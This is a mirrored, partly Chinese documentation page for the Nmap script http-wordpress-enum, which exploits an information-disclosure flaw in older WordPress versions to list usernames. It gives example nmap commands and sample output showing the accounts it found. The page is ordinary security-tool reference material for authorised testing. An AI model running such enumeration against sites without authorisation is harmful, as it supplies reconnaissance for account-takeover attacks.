http-wordpress-enum
脚本使用类型:
portrule
脚本所属分类:
auth, intrusive, vuln
脚本下载地址: http://nmap.org/svn/scripts/http-wordpress-enum.nse
Enumerates usernames in Wordpress blog/CMS installations by exploiting an information disclosure vulnerability existing in versions 2.6, 3.1, 3.1.1, 3.1.3 and 3.2-beta2 and possibly others.
Original advisory:
Upper limit for ID search. Default: 25
If set it saves the username list in this file.
Base path to Wordpress. Default: /
执行格式
nmap -p80 --script http-wordpress-enum <target> nmap -sV --script http-wordpress-enum --script-args limit=50 <target>
PORT STATE SERVICE REASON 80/tcp open http syn-ack | http-wordpress-enum: | Username found: admin | Username found: mauricio | Username found: cesar | Username found: lean | Username found: alex | Username found: ricardo |_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-enum.limit'
Author: Paulino Calderon
License: VER007 整理 http://www.ver007.com